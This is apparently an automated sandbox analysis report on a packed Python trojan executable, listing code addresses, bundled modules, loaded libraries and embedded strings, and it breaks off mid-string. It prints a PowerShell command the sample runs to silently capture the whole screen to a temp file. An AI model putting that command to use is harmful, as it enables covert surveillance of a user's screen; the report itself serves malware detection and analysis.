      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD3AE40_2_00007FF7FBDD3AE4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD22A40_2_00007FF7FBDD22A4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD1A840_2_00007FF7FBDD1A84
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE42800_2_00007FF7FBDE4280
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE0F380_2_00007FF7FBDE0F38
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD20A00_2_00007FF7FBDD20A0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD18800_2_00007FF7FBDD1880
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDE01C0_2_00007FF7FBDDE01C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE9FF80_2_00007FF7FBDE9FF8
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC8FD00_2_00007FF7FBDC8FD0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C0_2_00007FF7FBDD7E4C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE0F380_2_00007FF7FBDE0F38
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC1F500_2_00007FF7FBDC1F50
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE471C0_2_00007FF7FBDE471C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD5F300_2_00007FF7FBDD5F30
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE1EE40_2_00007FF7FBDE1EE4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD36E00_2_00007FF7FBDD36E0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD86D00_2_00007FF7FBDD86D0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD1E940_2_00007FF7FBDD1E94
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C0_2_00007FF7FBDD7E4C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE65EC0_2_00007FF7FBDE65EC
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE6D700_2_00007FF7FBDE6D70
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD2D500_2_00007FF7FBDD2D50
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4624302_2_00007FFEDC462430
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC461FD02_2_00007FFEDC461FD0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4748202_2_00007FFEDC474820
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4745D02_2_00007FFEDC4745D0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC481D802_2_00007FFEDC481D80
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4824A02_2_00007FFEDC4824A0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4835502_2_00007FFEDC483550
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4829C02_2_00007FFEDC4829C0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC482EC02_2_00007FFEDC482EC0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC481FF02_2_00007FFEDC481FF0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4921102_2_00007FFEDC492110
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC491D402_2_00007FFEDC491D40
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4A1F102_2_00007FFEDC4A1F10
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4A21C02_2_00007FFEDC4A21C0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4C1FA02_2_00007FFEDC4C1FA0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4D20502_2_00007FFEDC4D2050
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4D1F402_2_00007FFEDC4D1F40
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4E22D02_2_00007FFEDC4E22D0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4E1D402_2_00007FFEDC4E1D40
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4F21602_2_00007FFEDC4F2160
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC5020702_2_00007FFEDC502070
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC5222202_2_00007FFEDC522220
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBA9C802_2_00007FFEDCBA9C80
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBC8CB02_2_00007FFEDCBC8CB0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBAFC702_2_00007FFEDCBAFC70
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBBCDE02_2_00007FFEDCBBCDE0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBF9D802_2_00007FFEDCBF9D80
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBABDA02_2_00007FFEDCBABDA0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCD112F02_2_00007FFEDCD112F0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCD118A02_2_00007FFEDCD118A0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE7DE302_2_00007FFEDCE7DE30
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE75DC02_2_00007FFEDCE75DC0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE5BD802_2_00007FFEDCE5BD80
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE315412_2_00007FFEDCE31541
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE315912_2_00007FFEDCE31591
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE321F32_2_00007FFEDCE321F3
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE315552_2_00007FFEDCE31555
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31FE62_2_00007FFEDCE31FE6
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE799A02_2_00007FFEDCE799A0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE7D9602_2_00007FFEDCE7D960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD9609802_2_00007FFEDD960980
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD95C4802_2_00007FFEDD95C480
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FF7FBDC2B30 appears 47 times
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FFEDCEACD8F appears 85 times
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FFEDD953800 appears 51 times
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FFEDCE3132A appears 107 times
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FFEDCEACDA1 appears 264 times
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: String function: 00007FFEDD953880 appears 114 times
      Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: python3.dll.0.drStatic PE information: No import functions for PE file found
      Source: MkWMm5piE5.exe, 00000000.00000002.2590744064.0000023382125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32crypt.pyd0 vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000000.00000003.1340184493.0000023382119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exeBinary or memory string: OriginalFilename vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2597867781.00007FFEDD8B4000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603753882.00007FFEEF569000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603288281.00007FFEECEC6000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2599068889.00007FFEDDEE2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2599369269.00007FFEDEC89000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603647432.00007FFEEF45F000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603198957.00007FFEEC0D6000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2597001843.00007FFEDD1D1000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilenamepywintypes312.dll0 vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2599249816.00007FFEDEC4D000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603381235.00007FFEED7A7000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2602273101.00007FFEEBAA9000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2598981515.00007FFEDDEC5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2591160543.000001E4C86D0000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2597088127.00007FFEDD1FE000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: OriginalFilenamewin32crypt.pyd0 vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603859314.00007FFEF5CEB000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2599464149.00007FFEE6F3E000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2598868630.00007FFEDDE93000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2598741399.00007FFEDDE63000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2599155228.00007FFEDEC1B000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2603473390.00007FFEEF2FE000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs MkWMm5piE5.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs MkWMm5piE5.exe
      Source: classification engineClassification label: mal72.troj.evad.winEXE@6/87@2/2
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC8560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7FBDC8560
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682Jump to behavior
      Source: MkWMm5piE5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: MkWMm5piE5.exe, MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: MkWMm5piE5.exeReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile read: C:\Users\user\Desktop\MkWMm5piE5.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\MkWMm5piE5.exe "C:\Users\user\Desktop\MkWMm5piE5.exe"
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Users\user\Desktop\MkWMm5piE5.exe "C:\Users\user\Desktop\MkWMm5piE5.exe"
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Users\user\Desktop\MkWMm5piE5.exe "C:\Users\user\Desktop\MkWMm5piE5.exe"Jump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") "Jump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: libffi-8.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: libcrypto-3.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: libssl-3.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: libcrypto-3.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: sqlite3.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: pywintypes312.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: MkWMm5piE5.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: MkWMm5piE5.exeStatic file information: File size 17155097 > 1048576
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: MkWMm5piE5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: MkWMm5piE5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: MkWMm5piE5.exe, 00000002.00000002.2597267062.00007FFEDD613000.00000002.00000001.01000000.00000004.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == 